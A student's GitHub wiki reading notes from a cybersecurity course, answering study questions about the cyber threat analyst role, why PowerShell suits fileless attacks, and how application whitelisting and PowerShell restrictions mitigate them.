401D8 read26 - carlosjorr/reading-notes GitHub Wiki

Remote Code Execution

You just got a new job as a Cyber Threat Analyst, how would you explain your role to a family member?

main goal is to detect and prevent any malicious activities or cyberattacks that could harm the organization's digital assets. I'll be analyzing data, identifying vulnerabilities, and developing strategies to defend against cyber threats. It's a bit like being a digital detective, working to keep our digital world safe from bad actors

Explain what makes PowerShell such an effective attack vector.

Virus-infected files and malicious trojans are established malware types, and developers have various defensive detection and mitigation techniques to defend against them. Browsers verify downloaded files; applications need approved permissions before installation; and security software can scan files to be written, read, and/or executed to check for known signatures. Even malware delivered via Microsoft Office macros are obstructed by default settings that no longer allow automatic execution.

Attackers can use fileless malware to get around these safeguards by injecting payloads into running applications or by utilizing scripting. PowerShell is an ideal channel for delivering these attacks because of its wide deployment and access to all parts of a host via the .NET framework. Additionally, it is easy to develop scripts applicable for payload delivery, and because PowerShell is a trusted application, it will almost always be allowed to execute scripts with impunity.

What are two things you can do to mitigate attacks that leverage PowerShell?

Application Whitelisting: This involves creating a list of approved applications that can run on the system. By only allowing known and trusted applications, we can prevent unauthorized use of PowerShell or any other potentially harmful programs.

Restricting PowerShell Usage: By limiting who can run PowerShell scripts and what those scripts can do, we can reduce the potential for abuse. We can use Group Policies or security settings to restrict PowerShell's capabilities, especially on endpoints that don't require it for normal operations.